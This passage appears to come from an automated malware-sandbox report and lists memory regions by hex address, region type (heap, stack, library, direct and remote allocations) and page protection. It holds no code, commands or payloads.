|
page read and write
|
||
|
2EB0000
|
heap
|
page read and write
|
||
|
23BCC000
|
stack
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
5BE000
|
stack
|
page read and write
|
||
|
753E000
|
stack
|
page read and write
|
||
|
24241000
|
heap
|
page read and write
|
||
|
473000
|
system
|
page execute and read and write
|
||
|
5D6F000
|
stack
|
page read and write
|
||
|
20B5C2C0000
|
heap
|
page readonly
|
||
|
3647000
|
heap
|
page read and write
|
||
|
74F0000
|
trusted library allocation
|
page read and write
|
||
|
81CE000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
6CF0000
|
heap
|
page read and write
|
||
|
8192000
|
heap
|
page read and write
|
||
|
15B0000
|
unkown
|
page readonly
|
||
|
20B6CA9E000
|
trusted library allocation
|
page read and write
|
||
|
11A0000
|
unkown
|
page readonly
|
||
|
2DCE000
|
stack
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
4CB1000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
2D132FE000
|
stack
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
7376000
|
heap
|
page read and write
|
||
|
3344000
|
heap
|
page read and write
|
||
|
5F1E000
|
heap
|
page read and write
|
||
|
CB62000
|
direct allocation
|
page execute and read and write
|
||
|
2E10000
|
heap
|
page read and write
|
||
|
2F7C000
|
stack
|
page read and write
|
||
|
2C84000
|
heap
|
page read and write
|
||
|
85D0000
|
direct allocation
|
page read and write
|
||
|
2BDA000
|
heap
|
page read and write
|
||
|
2F67FC000
|
stack
|
page read and write
|
||
|
360C000
|
heap
|
page read and write
|
||
|
48EE000
|
stack
|
page read and write
|
||
|
23F9C000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
5D60000
|
direct allocation
|
page read and write
|
||
|
3719000
|
heap
|
page read and write
|
||
|
73EE000
|
heap
|
page read and write
|
||
|
8260000
|
heap
|
page read and write
|
||
|
7DF426CA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
6B9D000
|
stack
|
page read and write
|
||
|
970000
|
unkown
|
page readonly
|
||
|
7F20000
|
trusted library allocation
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
23F9E000
|
heap
|
page read and write
|
||
|
8170000
|
trusted library allocation
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
749A000
|
heap
|
page read and write
|
||
|
3631000
|
heap
|
page read and write
|
||
|
50C8000
|
trusted library allocation
|
page read and write
|
||
|
8170000
|
direct allocation
|
page read and write
|
||
|
35FA000
|
heap
|
page read and write
|
||
|
6ACE000
|
stack
|
page read and write
|
||
|
3680C000
|
system
|
page read and write
|
||
|
BCC000
|
heap
|
page read and write
|
||
|
8260000
|
trusted library allocation
|
page read and write
|
||
|
45BF000
|
stack
|
page read and write
|
||
|
94F000
|
stack
|
page read and write
|
||
|
818B000
|
heap
|
page read and write
|
||
|
218F0000
|
heap
|
page read and write
|
||
|
4CA5000
|
heap
|
page read and write
|
||
|
532F000
|
stack
|
page read and write
|
||
|
35E6000
|
heap
|
page read and write
|
||
|
36CA000
|
heap
|
page read and write
|
||
|
BCC000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
344F000
|
stack
|
page read and write
|
||
|
7460000
|
trusted library allocation
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3664000
|
heap
|
page read and write
|
||
|
83D000
|
heap
|
page read and write
|
||
|
402D000
|
unkown
|
page execute and read and write
|
||
|
1B9F8180000
|
trusted library allocation
|
page read and write
|
||
|
773F000
|
trusted library allocation
|
page read and write
|
||
|
8181000
|
heap
|
page read and write
|
||
|
2ADE000
|
stack
|
page read and write
|
||
|
6EAE000
|
stack
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
323F000
|
stack
|
page read and write
|
||
|
4B0A000
|
heap
|
page read and write
|
||
|
7470000
|
trusted library allocation
|
page execute and read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
81B0000
|
direct allocation
|
page read and write
|
||
|
20B5CFED000
|
trusted library allocation
|
page read and write
|
||
|
3651000
|
heap
|
page read and write
|
||
|
3344000
|
heap
|
page read and write
|
||
|
227000
|
unkown
|
page readonly
|
||
|
3254000
|
heap
|
page read and write
|
||
|
30E2000
|
unkown
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3254000
|
heap
|
page read and write
|
||
|
7FFD9B690000
|
trusted library allocation
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
7320000
|
heap
|
page read and write
|
||
|
20B5AA41000
|
heap
|
page read and write
|
||
|
8750000
|
trusted library allocation
|
page read and write
|
||
|
23F0000
|
heap
|
page read and write
|
||
|
3443000
|
remote allocation
|
page execute and read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
26FD000
|
stack
|
page read and write
|
||
|
85C0000
|
direct allocation
|
page read and write
|
||
|
1B9F8403000
|
trusted library allocation
|
page read and write
|
||
|
364B000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
78D000
|
heap
|
page read and write
|
||
|
8181000
|
heap
|
page read and write
|
||
|
2E3E000
|
stack
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
2C60000
|
heap
|
page read and write
|
||
|
57D0000
|
trusted library allocation
|
page read and write
|
||
|
6D70000
|
direct allocation
|
page read and write
|
||
|
3610000
|
heap
|
page read and write
|
||
|
3320000
|
heap
|
page read and write
|
||
|
2C80000
|
heap
|
page read and write
|
||
|
473C000
|
stack
|
page read and write
|
||
|
7720000
|
trusted library allocation
|
page read and write
|
||
|
20B5A7E0000
|
heap
|
page read and write
|
||
|
8180000
|
trusted library allocation
|
page read and write
|
||
|
3971000
|
heap
|
page read and write
|
||
|
84CF000
|
stack
|
page read and write
|
||
|
4C9B000
|
heap
|
page read and write
|
||
|
5DB0000
|
direct allocation
|
page read and write
|
||
|
3254000
|
heap
|
page read and write
|
||
|
43B0000
|
heap
|
page read and write
|
||
|
4788000
|
trusted library allocation
|
page read and write
|
||
|
33F0000
|
heap
|
page read and write
|
||
|
4602000
|
trusted library allocation
|
page read and write
|
||
|
4C4D000
|
trusted library allocation
|
page read and write
|
||
|
7F0000
|
heap
|
page read and write
|
||
|
70D0000
|
heap
|
page read and write
|
||
|
1460000
|
unkown
|
page readonly
|
||
|
4CB8000
|
heap
|
page read and write
|
||
|
23F2C000
|
heap
|
page read and write
|
||
|
23B4B000
|
stack
|
page read and write
|
||
|
5EC000
|
stack
|
page read and write
|
||
|
7F40000
|
heap
|
page read and write
|
||
|
23F41000
|
heap
|
page read and write
|
||
|
7EE000
|
stack
|
page read and write
|
||
|
4D68000
|
heap
|
page read and write
|
||
|
9F0000
|
heap
|
page read and write
|
||
|
3635000
|
heap
|
page read and write
|
||
|
A10000
|
heap
|
page read and write
|
||
|
81BF000
|
heap
|
page read and write
|
||
|
4C54000
|
heap
|
page read and write
|
||
|
7190000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
20B749E0000
|
heap
|
page execute and read and write
|
||
|
87B0000
|
direct allocation
|
page read and write
|
||
|
23A00000
|
heap
|
page read and write
|
||
|
1341000
|
system
|
page execute and read and write
|
||
|
3664000
|
heap
|
page read and write
|
||
|
4CA5000
|
heap
|
page read and write
|
||
|
105A000
|
stack
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
2C25000
|
heap
|
page read and write
|
||
|
6C30000
|
direct allocation
|
page read and write
|
||
|
53B000
|
stack
|
page read and write
|
||
|
445A000
|
trusted library allocation
|
page execute and read and write
|
||
|
20B74913000
|
heap
|
page read and write
|
||
|
23E83000
|
unclassified section
|
page execute and read and write
|
||
|
3783000
|
heap
|
page read and write
|
||
|
3607000
|
heap
|
page read and write
|
||
|
7FFD9B5E2000
|
trusted library allocation
|
page read and write
|
||
|
20B5CC50000
|
trusted library allocation
|
page read and write
|
||
|
83D000
|
heap
|
page read and write
|
||
|
7435000
|
heap
|
page read and write
|
||
|
8181000
|
heap
|
page read and write
|
||
|
7FFD9B5FB000
|
trusted library allocation
|
page read and write
|
||
|
20B5A920000
|
heap
|
page read and write
|
||
|
CFC000
|
stack
|
page read and write
|
||
|
4433000
|
trusted library allocation
|
page execute and read and write
|
||
|
7092000
|
heap
|
page read and write
|
||
|
3090000
|
heap
|
page read and write
|
||
|
3444000
|
heap
|
page read and write
|
||
|
762E000
|
stack
|
page read and write
|
||
|
3651000
|
heap
|
page read and write
|
||
|
4EA1000
|
trusted library allocation
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
7FFD9B890000
|
trusted library allocation
|
page read and write
|
||
|
2EA0000
|
heap
|
page read and write
|
||
|
3254000
|
heap
|
page read and write
|
||
|
87A0000
|
direct allocation
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
2C60000
|
heap
|
page read and write
|
||
|
B3A000
|
heap
|
page read and write
|
||
|
3B1D000
|
direct allocation
|
page execute and read and write
|
||
|
80B000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
20B5E07C000
|
trusted library allocation
|
page read and write
|
||
|
34FC000
|
heap
|
page read and write
|
||
|
19D000
|
stack
|
page read and write
|
||
|
4440000
|
trusted library allocation
|
page read and write
|
||
|
731A000
|
trusted library allocation
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
23F89000
|
heap
|
page read and write
|
||
|
33E0000
|
heap
|
page read and write
|
||
|
363C000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
8160000
|
direct allocation
|
page read and write
|
||
|
8180000
|
heap
|
page read and write
|
||
|
4A52000
|
remote allocation
|
page execute and read and write
|
||
|
46DE000
|
stack
|
page read and write
|
||
|
45E9000
|
trusted library allocation
|
page read and write
|
||
|
8280000
|
heap
|
page read and write
|
||
|
20B6CAAD000
|
trusted library allocation
|
page read and write
|
||
|
BB7000
|
heap
|
page read and write
|
||
|
23400000
|
heap
|
page read and write
|
||
|
4449000
|
trusted library allocation
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
1450000
|
unkown
|
page readonly
|
||
|
4780000
|
trusted library allocation
|
page read and write
|
||
|
3657000
|
heap
|
page read and write
|
||
|
41B000
|
system
|
page execute and read and write
|
||
|
3254000
|
heap
|
page read and write
|
||
|
8330000
|
heap
|
page read and write
|
||
|
34E0000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
2E7E000
|
stack
|
page read and write
|
||
|
440000
|
heap
|
page read and write
|
||
|
5D90000
|
direct allocation
|
page read and write
|
||
|
23E10000
|
unclassified section
|
page execute and read and write
|
||
|
80A0000
|
trusted library allocation
|
page read and write
|
||
|
1B9F6860000
|
heap
|
page read and write
|
||
|
732E000
|
trusted library allocation
|
page read and write
|
||
|
21680000
|
direct allocation
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
20B5CC39000
|
trusted library allocation
|
page read and write
|
||
|
3640000
|
heap
|
page read and write
|
||
|
4B06000
|
heap
|
page read and write
|
||
|
880E000
|
stack
|
page read and write
|
||
|
7FFD9B6C6000
|
trusted library allocation
|
page execute and read and write
|
||
|
218AE000
|
stack
|
page read and write
|
||
|
3D32000
|
direct allocation
|
page execute and read and write
|
||
|
8181000
|
heap
|
page read and write
|
||
|
7320000
|
trusted library allocation
|
page read and write
|
||
|
50EE000
|
stack
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
5626000
|
trusted library allocation
|
page read and write
|
||
|
D10000
|
heap
|
page read and write
|
||
|
8181000
|
heap
|
page read and write
|
||
|
3344000
|
heap
|
page read and write
|
||
|
8198000
|
heap
|
page read and write
|
||
|
819A000
|
heap
|
page read and write
|
||
|
1B9F8400000
|
trusted library allocation
|
page read and write
|
||
|
237E0000
|
direct allocation
|
page read and write
|
||
|
51A0000
|
heap
|
page read and write
|
||
|
8457000
|
heap
|
page read and write
|
||
|
1B9F8160000
|
heap
|
page read and write
|
||
|
45A0000
|
trusted library section
|
page read and write
|
||
|
20B74964000
|
heap
|
page read and write
|
||
|
483E000
|
stack
|
page read and write
|
||
|
2D1317D000
|
stack
|
page read and write
|
||
|
36AD000
|
heap
|
page read and write
|
||
|
3EBE000
|
unkown
|
page read and write
|
||
|
8190000
|
heap
|
page read and write
|
||
|
5DF0000
|
direct allocation
|
page read and write
|
||
|
4404000
|
unclassified section
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
1190000
|
unkown
|
page readonly
|
||
|
20B74B60000
|
heap
|
page execute and read and write
|
||
|
7740000
|
trusted library allocation
|
page read and write
|
||
|
7750000
|
heap
|
page read and write
|
||
|
B6C000
|
heap
|
page read and write
|
||
|
2F77FE000
|
stack
|
page read and write
|
||
|
8110000
|
direct allocation
|
page read and write
|
||
|
20B5C2E0000
|
heap
|
page execute and read and write
|
||
|
6EBF000
|
stack
|
page read and write
|
||
|
7290000
|
trusted library allocation
|
page read and write
|
||
|
2D130BE000
|
stack
|
page read and write
|
||
|
3646000
|
heap
|
page read and write
|
||
|
74B7000
|
heap
|
page read and write
|
||
|
2B3D000
|
heap
|
page read and write
|
||
|
AD0000
|
heap
|
page read and write
|
||
|
6E40000
|
trusted library allocation
|
page read and write
|
||
|
21C50000
|
direct allocation
|
page execute and read and write
|
||
|
20B5CFFE000
|
trusted library allocation
|
page read and write
|
||
|
3254000
|
heap
|
page read and write
|
||
|
23D40000
|
unclassified section
|
page execute and read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
23C4D000
|
stack
|
page read and write
|
||
|
23E69000
|
unclassified section
|
page execute and read and write
|
||
|
3FA0000
|
remote allocation
|
page execute and read and write
|
||
|
76F0000
|
trusted library allocation
|
page read and write
|
||
|
9F8000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
6D00000
|
heap
|
page read and write
|
||
|
4F6E000
|
stack
|
page read and write
|
||
|
33D0000
|
heap
|
page read and write
|
||
|
A087000
|
trusted library allocation
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
57D0000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
20B6C7C0000
|
trusted library allocation
|
page read and write
|
||
|
930000
|
heap
|
page read and write
|
||
|
970000
|
unkown
|
page readonly
|
||
|
363C000
|
heap
|
page read and write
|
||
|
23970000
|
remote allocation
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
84D000
|
heap
|
page read and write
|
||
|
20B5CFF9000
|
trusted library allocation
|
page read and write
|
||
|
3631000
|
heap
|
page read and write
|
||
|
1400000
|
unkown
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
4C1B000
|
trusted library allocation
|
page read and write
|
||
|
82F000
|
heap
|
page read and write
|
||
|
7FFD9B860000
|
trusted library allocation
|
page read and write
|
||
|
4C85000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
8186000
|
heap
|
page read and write
|
||
|
1B9F840F000
|
trusted library allocation
|
page read and write
|
||
|
838C000
|
stack
|
page read and write
|
||
|
3344000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
2A868F20000
|
heap
|
page read and write
|
||
|
57D0000
|
trusted library allocation
|
page read and write
|
||
|
1B9F8421000
|
trusted library allocation
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
4C5C000
|
heap
|
page read and write
|
||
|
20B5C7B1000
|
trusted library allocation
|
page read and write
|
||
|
2F6A000
|
heap
|
page read and write
|
||
|
3687000
|
heap
|
page read and write
|
||
|
9F4000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3639000
|
heap
|
page read and write
|
||
|
5CE0000
|
heap
|
page read and write
|
||
|
546D000
|
stack
|
page read and write
|
||
|
770000
|
heap
|
page read and write
|
||
|
BAA000
|
heap
|
page read and write
|
||
|
23F99000
|
heap
|
page read and write
|
||
|
4820000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B5E4000
|
trusted library allocation
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
80B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A868FA4000
|
heap
|
page read and write
|
||
|
7660000
|
trusted library allocation
|
page read and write
|
||
|
478D000
|
stack
|
page read and write
|
||
|
8181000
|
heap
|
page read and write
|
||
|
2176D000
|
stack
|
page read and write
|
||
|
2B90000
|
unkown
|
page execute and read and write
|
||
|
4465000
|
trusted library allocation
|
page execute and read and write
|
||
|
431E000
|
stack
|
page read and write
|
||
|
23F74000
|
heap
|
page read and write
|
||
|
85B0000
|
direct allocation
|
page read and write
|
||
|
2730000
|
heap
|
page read and write
|
||
|
2D7E000
|
stack
|
page read and write
|
||
|
74D1000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3254000
|
heap
|
page read and write
|
||
|
2171F000
|
stack
|
page read and write
|
||
|
211000
|
unkown
|
page execute read
|
||
|
23C0E000
|
stack
|
page read and write
|
||
|
DF0000
|
heap
|
page read and write
|
||
|
2B40000
|
heap
|
page read and write
|
||
|
4971000
|
trusted library allocation
|
page read and write
|
||
|
4AF0000
|
heap
|
page read and write
|
||
|
2B40000
|
heap
|
page read and write
|
||
|
23970000
|
remote allocation
|
page read and write
|
||
|
45DD000
|
trusted library allocation
|
page execute and read and write
|
||
|
4975000
|
trusted library allocation
|
page read and write
|
||
|
6C9E000
|
stack
|
page read and write
|
||
|
58C9000
|
trusted library allocation
|
page read and write
|
||
|
8491000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
4CF6000
|
trusted library allocation
|
page read and write
|
||
|
4FD5000
|
trusted library allocation
|
page read and write
|
||
|
4C24000
|
heap
|
page read and write
|
||
|
757E000
|
stack
|
page read and write
|
||
|
7440000
|
trusted library allocation
|
page read and write
|
||
|
364E000
|
heap
|
page read and write
|
||
|
309C000
|
heap
|
page read and write
|
||
|
6E8D000
|
stack
|
page read and write
|
||
|
2BDF000
|
stack
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
8C0000
|
heap
|
page read and write
|
||
|
4C4D000
|
heap
|
page read and write
|
||
|
12A1000
|
unkown
|
page readonly
|
||
|
3401000
|
heap
|
page read and write
|
||
|
2D12DF6000
|
stack
|
page read and write
|
||
|
8130000
|
direct allocation
|
page read and write
|
||
|
3876000
|
unkown
|
page read and write
|
||
|
33F4000
|
heap
|
page read and write
|
||
|
2F7E000
|
stack
|
page read and write
|
||
|
73F7000
|
heap
|
page read and write
|
||
|
20B74966000
|
heap
|
page read and write
|
||
|
3280000
|
remote allocation
|
page execute and read and write
|
||
|
55E9000
|
trusted library allocation
|
page read and write
|
||
|
7500000
|
trusted library allocation
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
7FFD9B8D0000
|
trusted library allocation
|
page read and write
|
||
|
2EF9000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B5E0000
|
trusted library allocation
|
page read and write
|
||
|
7F60000
|
trusted library allocation
|
page read and write
|
||
|
23F3A000
|
heap
|
page read and write
|
||
|
23B8E000
|
stack
|
page read and write
|
||
|
2B07000
|
stack
|
page read and write
|
||
|
2A869190000
|
heap
|
page read and write
|
||
|
2FE0000
|
heap
|
page read and write
|
||
|
20B5CE15000
|
trusted library allocation
|
page read and write
|
||
|
47DC000
|
stack
|
page read and write
|
||
|
20B5E5BB000
|
trusted library allocation
|
page read and write
|
||
|
8181000
|
heap
|
page read and write
|
||
|
8A0000
|
heap
|
page read and write
|
||
|
D30000
|
unkown
|
page readonly
|
||
|
34DE000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
20B5E5C9000
|
trusted library allocation
|
page read and write
|
||
|
2D1430E000
|
stack
|
page read and write
|
||
|
9DA000
|
stack
|
page read and write
|
||
|
80F0000
|
direct allocation
|
page read and write
|
||
|
2EE3000
|
trusted library allocation
|
page execute and read and write
|
||
|
771000
|
heap
|
page read and write
|
||
|
23FB1000
|
heap
|
page read and write
|
||
|
4795000
|
heap
|
page execute and read and write
|
||
|
2AF0000
|
heap
|
page read and write
|
||
|
21C44000
|
heap
|
page read and write
|
||
|
20B748FA000
|
heap
|
page read and write
|
||
|
2411C000
|
heap
|
page read and write
|
||
|
74B0000
|
trusted library allocation
|
page read and write
|
||
|
75A0000
|
trusted library allocation
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
20B5C280000
|
trusted library allocation
|
page read and write
|
||
|
2C68000
|
heap
|
page read and write
|
||
|
2E9E000
|
unkown
|
page read and write
|
||
|
23EA1000
|
heap
|
page read and write
|
||
|
2B70000
|
heap
|
page read and write
|
||
|
344E000
|
stack
|
page read and write
|
||
|
4410000
|
trusted library section
|
page read and write
|
||
|
364A000
|
heap
|
page read and write
|
||
|
364A000
|
heap
|
page read and write
|
||
|
8590000
|
trusted library allocation
|
page read and write
|
||
|
5D70000
|
direct allocation
|
page read and write
|
||
|
21DEE000
|
direct allocation
|
page execute and read and write
|
||
|
365E000
|
heap
|
page read and write
|
||
|
5971000
|
trusted library allocation
|
page read and write
|
||
|
DC0000
|
unkown
|
page read and write
|
||
|
8172000
|
heap
|
page read and write
|
||
|
2ED0000
|
trusted library allocation
|
page read and write
|
||
|
4DBD000
|
trusted library allocation
|
page read and write
|
||
|
23F41000
|
heap
|
page read and write
|
||
|
5F9A000
|
heap
|
page read and write
|
||
|
766E000
|
stack
|
page read and write
|
||
|
AD62000
|
direct allocation
|
page execute and read and write
|
||
|
20B6C7D1000
|
trusted library allocation
|
page read and write
|
||
|
35A0000
|
heap
|
page read and write
|
||
|
45FA000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B9F68B0000
|
heap
|
page read and write
|
||
|
B762000
|
direct allocation
|
page execute and read and write
|
||
|
20B5E07F000
|
trusted library allocation
|
page read and write
|
||
|
2DFE000
|
stack
|
page read and write
|
||
|
3657000
|
heap
|
page read and write
|
||
|
65FC000
|
stack
|
page read and write
|
||
|
364D000
|
heap
|
page read and write
|
||
|
81B5000
|
heap
|
page read and write
|
||
|
4EEC000
|
trusted library allocation
|
page read and write
|
||
|
1B9F67B1000
|
system
|
page execute and read and write
|
||
|
2D1440B000
|
stack
|
page read and write
|
||
|
3340000
|
heap
|
page read and write
|
||
|
44C0000
|
heap
|
page read and write
|
||
|
227000
|
unkown
|
page readonly
|
||
|
4880000
|
heap
|
page execute and read and write
|
||
|
364E000
|
heap
|
page read and write
|
||
|
853E000
|
stack
|
page read and write
|
||
|
2FAF000
|
stack
|
page read and write
|
||
|
7FFD9B800000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
7450000
|
heap
|
page execute and read and write
|
||
|
2F15000
|
trusted library allocation
|
page execute and read and write
|
||
|
80A0000
|
heap
|
page read and write
|
||
|
34DF000
|
stack
|
page read and write
|
||
|
7510000
|
trusted library allocation
|
page read and write
|
||
|
85F0000
|
direct allocation
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3639000
|
heap
|
page read and write
|
||
|
5C6F000
|
stack
|
page read and write
|
||
|
10C0000
|
unkown
|
page readonly
|
||
|
13A4000
|
system
|
page execute and read and write
|
||
|
358F000
|
heap
|
page read and write
|
||
|
4C59000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
2FBF000
|
unkown
|
page read and write
|
||
|
2CEF000
|
heap
|
page read and write
|
||
|
725F000
|
heap
|
page read and write
|
||
|
74CB000
|
heap
|
page read and write
|
||
|
8EB0000
|
direct allocation
|
page execute and read and write
|
||
|
37AA000
|
heap
|
page read and write
|
||
|
36CA000
|
heap
|
page read and write
|
||
|
2990000
|
heap
|
page read and write
|
||
|
7EF7000
|
stack
|
page read and write
|
||
|
48A0000
|
heap
|
page read and write
|
||
|
20B5CEDD000
|
trusted library allocation
|
page read and write
|
||
|
4A4C000
|
unclassified section
|
page read and write
|
||
|
20B5C83C000
|
trusted library allocation
|
page read and write
|
||
|
27E0000
|
heap
|
page read and write
|
||
|
33F4000
|
heap
|
page read and write
|
||
|
41E2000
|
unkown
|
page read and write
|
||
|
821E000
|
stack
|
page read and write
|
||
|
4AF1000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
246B0000
|
heap
|
page read and write
|
||
|
590000
|
heap
|
page read and write
|
||
|
8140000
|
direct allocation
|
page read and write
|
||
|
3658000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
6D6E000
|
stack
|
page read and write
|
||
|
23A4C000
|
stack
|
page read and write
|
||
|
215FC000
|
stack
|
page read and write
|
||
|
3648000
|
heap
|
page read and write
|
||
|
83CE000
|
stack
|
page read and write
|
||
|
2D131FE000
|
stack
|
page read and write
|
||
|
7F50000
|
trusted library allocation
|
page execute and read and write
|
||
|
6DA0000
|
direct allocation
|
page read and write
|
||
|
236EE000
|
stack
|
page read and write
|
||
|
20B5CFE7000
|
trusted library allocation
|
page read and write
|
||
|
3240000
|
direct allocation
|
page read and write
|
||
|
950000
|
unkown
|
page readonly
|
||
|
20B5AA8A000
|
heap
|
page read and write
|
||
|
81C0000
|
direct allocation
|
page read and write
|
||
|
82F000
|
heap
|
page read and write
|
||
|
3641000
|
heap
|
page read and write
|
||
|
3657000
|
heap
|
page read and write
|
||
|
3596000
|
heap
|
page read and write
|
||
|
7FFD9B8C0000
|
trusted library allocation
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
54E0000
|
trusted library allocation
|
page read and write
|
||
|
780000
|
heap
|
page read and write
|
||
|
4570000
|
heap
|
page read and write
|
||
|
3344000
|
heap
|
page read and write
|
||
|
81D6000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
1420000
|
unkown
|
page read and write
|
||
|
1B9F68E0000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
23F18000
|
heap
|
page read and write
|
||
|
2D21000
|
heap
|
page read and write
|
||
|
3640000
|
heap
|
page read and write
|
||
|
2388F000
|
stack
|
page read and write
|
||
|
2B9E000
|
heap
|
page read and write
|
||
|
20B74A00000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
21FA0000
|
unclassified section
|
page execute and read and write
|
||
|
5F7C000
|
heap
|
page read and write
|
||
|
39EE000
|
stack
|
page read and write
|
||
|
365D000
|
heap
|
page read and write
|
||
|
960000
|
unkown
|
page readonly
|
||
|
3639000
|
heap
|
page read and write
|
||
|
5F90000
|
heap
|
page read and write
|
||
|
582C000
|
stack
|
page read and write
|
||
|
359A000
|
heap
|
page read and write
|
||
|
849E000
|
stack
|
page read and write
|
||
|
8E83000
|
direct allocation
|
page execute and read and write
|
||
|
20B5C300000
|
heap
|
page read and write
|
||
|
3330000
|
heap
|
page read and write
|
||
|
30A0000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
4D1E000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B850000
|
trusted library allocation
|
page read and write
|
||
|
3630000
|
heap
|
page read and write
|
||
|
7FFD9B910000
|
trusted library allocation
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
80C0000
|
trusted library allocation
|
page read and write
|
||
|
7F090000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D3E000
|
stack
|
page read and write
|
||
|
3631000
|
heap
|
page read and write
|
||
|
4D2D000
|
trusted library allocation
|
page read and write
|
||
|
48BA000
|
unclassified section
|
page read and write
|
||
|
2EE8000
|
stack
|
page read and write
|
||
|
2D1327E000
|
stack
|
page read and write
|
||
|
3254000
|
heap
|
page read and write
|
||
|
4C5E000
|
heap
|
page read and write
|
||
|
5E40000
|
direct allocation
|
page read and write
|
||
|
8181000
|
heap
|
page read and write
|
||
|
3254000
|
heap
|
page read and write
|
||
|
20B5E5A4000
|
trusted library allocation
|
page read and write
|
||
|
BCC000
|
heap
|
page read and write
|
||
|
5DD0000
|
heap
|
page read and write
|
||
|
5E80000
|
direct allocation
|
page read and write
|
||
|
8170000
|
trusted library allocation
|
page execute and read and write
|
||
|
2EE4000
|
trusted library allocation
|
page read and write
|
||
|
8181000
|
heap
|
page read and write
|
||
|
35A2000
|
heap
|
page read and write
|
||
|
7FFD9B6A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
576E000
|
stack
|
page read and write
|
||
|
3719000
|
heap
|
page read and write
|
||
|
20B5A940000
|
heap
|
page read and write
|
||
|
1290000
|
unkown
|
page read and write
|
||
|
4C9D000
|
heap
|
page read and write
|
||
|
48A1000
|
trusted library allocation
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3D42000
|
unclassified section
|
page read and write
|
||
|
3654000
|
heap
|
page read and write
|
||
|
4968000
|
heap
|
page read and write
|
||
|
7FFD9B7F0000
|
trusted library allocation
|
page read and write
|
||
|
23B0F000
|
stack
|
page read and write
|
||
|
6C40000
|
direct allocation
|
page read and write
|
||
|
8630000
|
trusted library allocation
|
page execute and read and write
|
||
|
2DD0000
|
heap
|
page read and write
|
||
|
27BD000
|
stack
|
page read and write
|
||
|
86EE000
|
stack
|
page read and write
|
||
|
